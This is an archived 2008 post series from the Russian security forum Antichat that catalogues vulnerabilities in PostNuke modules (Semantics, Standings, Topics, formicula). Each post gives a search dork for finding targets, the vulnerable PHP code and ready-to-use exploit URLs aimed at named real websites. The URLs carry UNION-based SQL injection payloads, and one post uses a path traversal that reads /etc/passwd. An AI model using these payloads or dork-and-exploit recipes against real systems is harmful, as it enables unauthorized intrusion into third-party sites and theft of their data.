ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

20.12.2008, 14:10
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
PostNuke. Модуль: Semantics SQL
Уязвимый продукт: Модуль: Semantics
Версия: .71
Дорк: "inurl:module=Semantics"
Условие: "нет"
Уязвимый кусок кода:
PHP код:
$sql = "SELECT $semanticscolumn[category],
$semanticscolumn[description]
FROM $semanticstable
WHERE $semanticscolumn[cid] = $cid";
Уязвимый параметр cid
Пример уязвимости:
http://www.astrobio.net/news/index.php?module=Semantics&func=display&cid=-1+union+select+concat_ws(0x3a,User(),Database(),Ve rsion()),2
|
|
|

20.12.2008, 17:29
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
PostNuke. Модуль: Standings множественные SQL
Уязвимый продукт: Модуль: Standings
Версия: 1.2
Дорк: "inurl:module=Standings"
Условие: "нет"
Уязвимый кусок кода:
Полное отсутствие фильтрации, если приводить код, то весь
Уязвимые параметры sid,scid,tid и т.д
Примеры уязвимостей:
http://www.usffl.info/old/index.php?module=Standings&func=displayteam&cid=3& sid=3&tid=-11+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,1 8,19/*
http://www.usffl.info/old/index.php?module=Standings&func=displaygame&cid=3& sid=3&scid=-263+union+select+1,2,3,4,5,6,concat_ws(0x3a,User() ,Database(),Version()),8,9,0/*
http://www.usffl.info/old/index.php?module=Standings&func=displaygame&cid=3& sid=-3+union+select+1,concat_ws(0x3a,User(),Database(), Version()),3,4,5/*
и т.д.
|
|
|

20.12.2008, 19:21
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
PostNuke. Модуль: Topics SQL
Уязвимый продукт: Модуль: Topics
Версия: 1.1c
Дорк: "inurl:module=Topics"
Условие: "нет"
Уязвимый кусок кода:
PHP код:
$sql = "SELECT $topicscolumn[topicnametag],
$topicscolumn[topictext],
$topicscolumn[topicexttext],
$topicscolumn[topicimage],
$topicscolumn[topicparent],
$topicscolumn[topicname]
FROM $topicstable
WHERE $topicscolumn[topicid] = $topicid";
Уязвимый параметр topicid
Примеры уязвимости:
http://www.fintraining.ru/index.php?module=Topics&func=display&topicid=-67+union+select+1,2,concat_ws(0x3a,User(),Database (),Version()),4,5,6/*
http://www.angelusonline.org/index.php?module=Topics&func=view&topicid=-6+union+select+1,2,concat_ws(0x3a,User(),Database( ),Version()),4,5,6/*
|
|
|

21.12.2008, 19:04
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
PostNuke. Модуль: formicula Чтение произвольных файлов
Уязвимый продукт: Модуль: formicula
Версия: 1.0
Дорк: "inurl:module=formicula"
Условие: "magic_quotes-off"
Ещё одна читалка, и опять не нашёл где скачать код, хотя по дорку модуль вроде достаточно популярен
Уязвимый параметр form
Пример уязвимости:
http://www.seacom-dtms.de/index.php?module=formicula&func=main&form=/../../../../../../../etc/passwd%00
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|